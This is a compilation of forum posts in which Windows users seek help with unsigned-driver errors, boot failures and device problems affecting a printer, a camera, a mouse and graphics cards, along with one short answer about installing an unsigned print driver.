Windows is unable to repair the problem, I can't boot in safe mode (with or without network, cmd or otherwise) and Windows can't find any recovery points to recover the system to, nor can I boot the computer from the last known working configuration. After some frustration I tried every option from the advanced boot menu, and lo and behold, the computer booted when I booted in disabled driver signature enforcement mode.

The computer seems to work fine in this mode. I ran sigverif.exe and it found one driver that was not signed, a driver used by Daemon tools lite (can't remember the name). The driver was signed, but still my computer wouldn't boot normally, so I tried to remove Daemon tools (hence why I can't remember the name), but the computer still won't boot normally.

Windows keeps telling me that I have three important updates to update, but I can't seem to update them. The updates are KB3067903 and KB3065987, but I have no idea if they are connected to the issue.

I am attaching a screenshot from dxdiag and from the DM log collector, if you need anything... Read more

Am trying to install HP Deskjet 630c printer and it keeps telling me this driver is not digitally signed. I just put Windows xp on the computer. What does this mean and can I get help? I am not very computer literate and any help would greatly appreciated. Many thanks Paula.

Answer:driver is not digitally signed

"Not digitally signed" means Microsoft have not tested this driver and verified it to be compatible with Win XP.  This does not mean it will not work, you should click on the "continue anyway" to install your print driver.  If this is a concern you should check the HP web site for newer driver tested by MS.Kim

I have been trying now to install drivers for my Panasonic Digital Camera, which installs itself as a ZIP drive (it uses a 3.5 100MB ZiP disk instead of memory cards), and Fusion Dazzle which is an analog to digital convereter. Both plug in via USB. They used to work perfectly until I had to reformat and reinstall Windows on my computer.

I now get an error message that it is missing certain files (which ARE on the system) and it is looking for "C:\PCLEUSB.drv". When I point it to the correct driver location I get an error message saying that this driver has not been digitally signed to be compatible for Windows XP and will now exit installation.

I am using the most current drivers from the manufacturer and they say that they are Windows compatible and I am the first to have this problem. So far, they have been unable to assist.

Any suggestions?
Ed

I recently got a docking station for my laptop (Dell precision M65 w/WinXP Pro SP3 all updates) and when I plugged it in (after all the plug-n-play stuff detected the new docking station stuff), the mouse plugged into the dock USB port would not work (it worked fine previously when plugged into the laptop USB port). I undocked and plugged the mouse back into the laptop's port but it still didn't work.

I went into the device management applet and and tried to update the driver. There was nothing under "Mice and other pointing devices" except the PS/2 touchpad. Under "Human Interface Devices" there was an entry called "HID-Compliant device" If I deleted that device and then did a "scan for hardware changes" I would get the "found new hardware" popup in the tray and then breifly see "Dell USB Optical Mouse" during which the mouse would work but within 2 or 3 seconds it would switch to "HID-Compliant device" and then inform me that my hardware was ready to use at which point the mouse stopped working.

After much screwing around with the device manager and various other USB mice, I found that I could use the "Update Driver" right-click menu item to force the driver to "HID-Compliant mouse" by bypassing all the "Automatic" stuff. This resuted in a working mouse, but I have to do this every time I turn on the laptop.

I have noticed that while following the dialogs during... Read more

I'll try to keep this brief:

> Upgraded GFX cards to 2 x Asus EAH4980 (ATI Radeon HD4890 architecture) from NVidia 8800GTS

> Performed full format on HD and reinstalled Windows Vista X64 Home Premium as well as SP1 and SP2

> Installed chipset drivers etc.

> Installed bundled VGA drivers (8.592)

> Installed miscellaneous software/games

System was running very stable and performing well in Benchmarking tests and games. I then tried to update the VGA drivers to the latest versions, first from ATI's own website - Catalyst 9.8 with VGA driver displayed in Device Manager as 8.640 - and then from Asus' website - displayed as 8.630 in Device Manager.

No matter what drivers I update to I am met with BSOD errors as soon as I try to run any kind of media on my PC. The dump files/dxdiag info etc. is attached to this post.

Upon investigation I note that one driver is not loading and is listed as 'not digitally signed', namely

ATKDispLowFilter.sys

This driver is an AsusTek release. It appears to load ok before I perform these driver updates. I can find no reference to any issues with it either on Asus' forums or elsewhere so this doesn't appear to be a common problem.

I've tried to locate a signed version of the driver to no avail.

Any solution would be very much appreciated.

Phil
